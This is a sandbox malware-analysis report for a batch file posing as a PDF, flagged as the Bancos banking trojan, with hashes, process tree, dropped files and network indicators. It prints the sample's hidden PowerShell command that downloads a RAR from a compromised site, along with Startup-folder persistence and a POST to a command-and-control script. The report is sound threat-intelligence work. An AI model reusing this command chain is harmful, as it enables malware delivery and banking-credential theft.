analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

__Denuncia_Activa_CL.PDF.bat

Full analysis: https://app.any.run/tasks/e6f45912-ce02-4a7a-bf39-92ac402b6d1d
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: March 22, 2019, 10:33:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
bancos
opendir
Indicators:
MIME: text/plain
File info: Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
MD5:

1E541B14B531BCAC70E77A012B0F0F7F

SHA1:

0CA0CD36FB4C9DFEB3E325A01CFB7B75413D1F81

SHA256:

9008B75AC8BBAACBDA0DC47BB7D631F1C791CB346CC6F6A911E7993DA0834C09

SSDEEP:

24:QZYr06G6uSseKKjPKU+2jhJ7VEJZU89uND9IN9Ce:WTEDTL0Jfq5YEe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Writes to a start menu file

      • Ace32Loader.exe (PID: 2788)
      • Integrity.exe (PID: 1156)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2592)

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2592)

    • Application was dropped or rewritten from another process

      • Integrity.exe (PID: 1156)

    • BANCOS was detected

      • Integrity.exe (PID: 1156)

    • Connects to CnC server

      • Integrity.exe (PID: 1156)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2900)

    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2372)
      • WinRAR.exe (PID: 3020)
      • taskmgr.exe (PID: 2784)

    • Creates files in the user directory

      • powershell.exe (PID: 2372)
      • Ace32Loader.exe (PID: 2788)
      • notepad++.exe (PID: 2736)
      • Integrity.exe (PID: 1156)

    • Executable content was dropped or overwritten

      • Ace32Loader.exe (PID: 2788)
      • Integrity.exe (PID: 1156)

  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 2372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
87
Monitored processes
11
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs powershell.exe winrar.exe no specs ace32loader.exe ping.exe no specs shutdown.exe no specs notepad++.exe gup.exe #BANCOS integrity.exe taskmgr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2900C:\Windows\system32\cmd.exe /c ""C:\Users\admin\Desktop\__Denuncia_Activa_CL.PDF.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
9009
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2592C:\Windows\system32\cmd.exe /K "C:\Users\admin\Desktop\__Denuncia_Activa_CL.PDF.bat" C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2372PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('https://www.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar','C:\Users\admin\Downloads\g7ZzlZZuE.rar'); $Shell = New-Object -Com Shell.Application; $Zip = $Shell.NameSpace('C:\Users\admin\Downloads');C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3020"C:\Program Files\WinRAR\winRar.exe" x -y -c "C:\Users\admin\Downloads\g7ZzlZZuE.rar" "C:\Users\admin\Downloads"C:\Program Files\WinRAR\WinRAR.execmd.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2788"C:\Program Files\WinRAR\Ace32Loader.exe" Ace32LoaderMMF17053903020C:\Program Files\WinRAR\Ace32Loader.exe
WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2848ping 127.0.0.1 -n 1 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1648shutdown -rC:\Windows\system32\shutdown.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shutdown and Annotation Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2736"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\__Denuncia_Activa_CL.PDF.bat"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Don HO [email protected]
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.51
2252"C:\Program Files\Notepad++\updater\gup.exe" -v7.51 -px64C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
User:
admin
Company:
Don HO [email protected]
Integrity Level:
MEDIUM
Description:
GUP : a free (LGPL) Generic Updater
Exit code:
0
Version:
4.1
1156"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe" C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe
Explorer.EXE
User:
admin
Company:
BigRed
Integrity Level:
MEDIUM
Description:
BigRed
Version:
1.0.0.0
Total events
1 831
Read events
1 721
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
2372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DPQZJ4W9G3NVZYO6YMAE.temp
MD5:
SHA256:
2372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF19d046.TMPbinary
MD5:C83A87B307B532E275A473949B2C1F59
SHA256:CEB3A485242E1362010046B72FC10ACD629819BFD2B5B32B3FB2C98456987F18
2372powershell.exeC:\Users\admin\Downloads\g7ZzlZZuE.rarcompressed
MD5:AAFB4D8EBF63B50D80DAFF778226F7BC
SHA256:B5A84E8079DC8558D3960D711D8591500B69CF79E750ECAF88919E398C59383F
2788Ace32Loader.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exeexecutable
MD5:410B77D8F1CDC76C867B4A6A27AE55E5
SHA256:421448D92A6D871B218673025D4E4E121E263262F0CB5CD51E30853E2F8F04D7
2736notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\session.xmltext
MD5:281890ED782173431EDE0845102159F6
SHA256:889DEC81464167E4D0218AECE939F43B33DB9B86EBEDC1E1864111EC66D9334A
2736notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\config.xmlxml
MD5:C47AD0C50A1AFB04E9244A98C5687258
SHA256:E5FA2917AD0561D06F44F04C23E5E9810533207722EC5ABF35682C48561B33E1
2372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:C83A87B307B532E275A473949B2C1F59
SHA256:CEB3A485242E1362010046B72FC10ACD629819BFD2B5B32B3FB2C98456987F18
2736notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\stylers.xmlxml
MD5:44982E1D48434C0AB3E8277E322DD1E4
SHA256:3E661D3F1FF3977B022A0ACC26B840B5E57D600BC03DCFC6BEFDB408C665904C
2736notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\plugins\Config\converter.initext
MD5:F70F579156C93B097E656CABA577A5C9
SHA256:B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4
2788Ace32Loader.exeC:\Users\admin\Downloads\world.txttext
MD5:6E0D9920A8BA481D13EEB355147B13F3
SHA256:ED428CE14DC2EE5FCDEB3AD11E8DC315858F73BE187A4B072246B1B8662030A2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
13.107.4.50:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a709ef12e4d2d407
US
compressed
6.41 Kb
whitelisted
GET
200
201.17.166.187:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D
BR
der
471 b
whitelisted
GET
200
201.17.166.187:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D
BR
der
727 b
whitelisted
1156
Integrity.exe
GET
200
13.107.21.200:80
http://www.bing.com/
US
html
93.6 Kb
whitelisted
1156
Integrity.exe
POST
190.107.177.246:80
http://www.triosalud.cl/wp/wp-content/uploads/2019/03/up.php
CL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2252
gup.exe
37.59.28.236:443
notepad-plus-plus.org
OVH SAS
FR
whitelisted
1156
Integrity.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2372
powershell.exe
190.107.177.246:443
www.triosalud.cl
Gtd Internet S.A.
CL
malicious
13.107.4.50:80
ctldl.windowsupdate.com
Microsoft Corporation
US
whitelisted
201.17.166.187:80
ocsp.usertrust.com
CLARO S.A.
BR
unknown
1156
Integrity.exe
190.107.177.246:80
www.triosalud.cl
Gtd Internet S.A.
CL
malicious

DNS requests

Domain
IP
Reputation
www.triosalud.cl
  • 190.107.177.246
malicious
notepad-plus-plus.org
  • 37.59.28.236
whitelisted
ctldl.windowsupdate.com
  • 13.107.4.50
whitelisted
ocsp.usertrust.com
  • 201.17.166.187
whitelisted
teredo.ipv6.microsoft.com
whitelisted
www.bing.com
  • 13.107.21.200
whitelisted

Threats

PID
Process
Class
Message
1156
Integrity.exe
A Network Trojan was detected
MALWARE [PTsecurity] Banker.Bancos.deq C2 Response
2 ETPRO signatures available at the full report
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
__Denuncia_Activa_CL.PDF.bat